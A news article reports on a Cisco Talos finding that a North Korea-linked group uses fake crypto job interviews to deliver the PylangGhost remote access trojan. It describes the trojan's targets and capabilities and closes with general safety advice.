Cybersecurity experts have uncovered a disturbing campaign aimed at professionals in the blockchain sector, where fake job offers are being weaponized to deploy malicious software capable of stealing cryptocurrency wallet credentials and personal data.
According to a new report from Cisco Talos, a sophisticated remote access trojan (RAT) named PylangGhost has been observed targeting crypto enthusiasts and developers, particularly in regions like India. This malware, written in Python, is tied to a state-backed group often referred to as “Famous Chollima” (also known as “Wagemole”), believed to operate out of North Korea.
Please Register !
Deceptive Job Offers: The Perfect Bait
Please Register !
Victims are drawn in through fake job listings that imitate trusted companies in the crypto world—think names like Coinbase, Robinhood, and Uniswap. These fraudulent sites are meticulously designed to resemble real ones, tricking applicants into participating in staged recruitment processes.
Here's how the attack unfolds:
-
Initial contact: Victims receive messages from fake recruiters.
-
Skill assessment trap: They’re directed to seemingly legitimate sites for coding tests.
-
Video interviews: Targets are prompted to enable webcam and mic access.
-
Malicious payload: They're persuaded to run specific "video driver update" commands—actually launching the malware.
Please Register !
Meet PylangGhost: A RAT with a Crypto Twist
Please Register !
PylangGhost, a Python-based evolution of the previously known GolangGhost malware, offers an expansive feature set. Once deployed, it grants remote control over the compromised machine, allowing attackers to harvest sensitive information from over 80 browser extensions.
Please Register !
-
MetaMask
-
1Password
-
NordPass
-
Phantom
-
TronLink
-
Bitski
-
Initia
-
MultiverseX
Please Register !
More Than Just a Stealer
Please Register !
PylangGhost isn’t limited to snatching wallet data. It comes equipped with a wide toolkit:
-
Captures screenshots
Please Register !
-
Navigates and manipulates local files
Please Register !
-
Extracts browser session data
Please Register !
-
Scans system specifications
Please Register !
-
Maintains persistent remote access
Please Register !
Please Register !
Same Tactics, Evolving Tools
Please Register !
These social engineering strategies aren’t new. Similar scams were seen earlier this year when attackers linked to a $1.4 billion Bybit crypto heist baited developers with bogus recruitment exams—those, too, were infected with trojans.
Please Register !
Was AI Involved in the Malware Code?
Please Register !
Interestingly, analysis of the source code suggests that no large language model (like ChatGPT) was used in its development. Human-written comments and scripting styles point toward manual crafting, hinting at a deliberate attempt to avoid AI fingerprints.
Please Register !
How to Stay Safe
Please Register !
-
Always verify job opportunities through official company channels.
-
Avoid executing terminal commands during interviews, no matter how legitimate they appear.
-
Use sandbox environments for testing unknown applications or links.
-
Keep browser extensions and password managers updated with security patches.
